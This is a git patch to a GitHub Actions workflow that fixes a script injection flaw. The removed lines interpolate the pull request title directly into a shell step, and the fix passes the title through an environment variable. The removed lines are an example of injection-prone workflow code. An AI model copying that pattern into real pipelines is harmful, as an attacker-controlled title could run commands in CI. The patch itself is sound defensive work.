From adf5d1b3bb26dc1c1684856ea80d41c555784c22 Mon Sep 17 00:00:00 2001
From: Diogo Teles Sant'Anna <diogoteles@google.com>
Date: Thu, 15 Aug 2024 10:48:50 -0300
Subject: [PATCH] ci: fix github workflow vulnerable to script injection
 (#21304)

Signed-off-by: Diogo Teles Sant'Anna <diogoteles@google.com>
---
 .github/workflows/dependabot-update-all.yml | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/.github/workflows/dependabot-update-all.yml b/.github/workflows/dependabot-update-all.yml
index f68935443670..01e1ecc4eb4a 100644
--- a/.github/workflows/dependabot-update-all.yml
+++ b/.github/workflows/dependabot-update-all.yml
@@ -4,6 +4,9 @@ on: pull_request
 permissions:
   pull-requests: write
 
+env:
+  PR_TITLE: ${{ github.event.pull_request.title }}
+
 jobs:
   update-all:
     runs-on: ubuntu-latest
@@ -25,8 +28,8 @@ jobs:
           # Extract the dependency name from the PR title
           # Example: "build(deps): Bump github.com/cosmos/cosmos-sdk from 0.46.0 to 0.47.0"
           # Extracts "github.com/cosmos/cosmos-sdk" and "0.47.0"
-          echo "name=$(echo "${{ github.event.pull_request.title }}" | cut -d ' ' -f 3)" >> $GITHUB_OUTPUT
-          echo "version=$(echo "${{ github.event.pull_request.title }}" | cut -d ' ' -f 7)" >> $GITHUB_OUTPUT
+          echo "name=$(echo "$PR_TITLE" | cut -d ' ' -f 3)" >> $GITHUB_OUTPUT
+          echo "version=$(echo "$PR_TITLE" | cut -d ' ' -f 7)" >> $GITHUB_OUTPUT
       - name: Update all Go modules
         run: |
           ./scripts/go-update-dep-all.sh ${{ format('{0}@v{1}', steps.deps.outputs.name, steps.deps.outputs.version) }}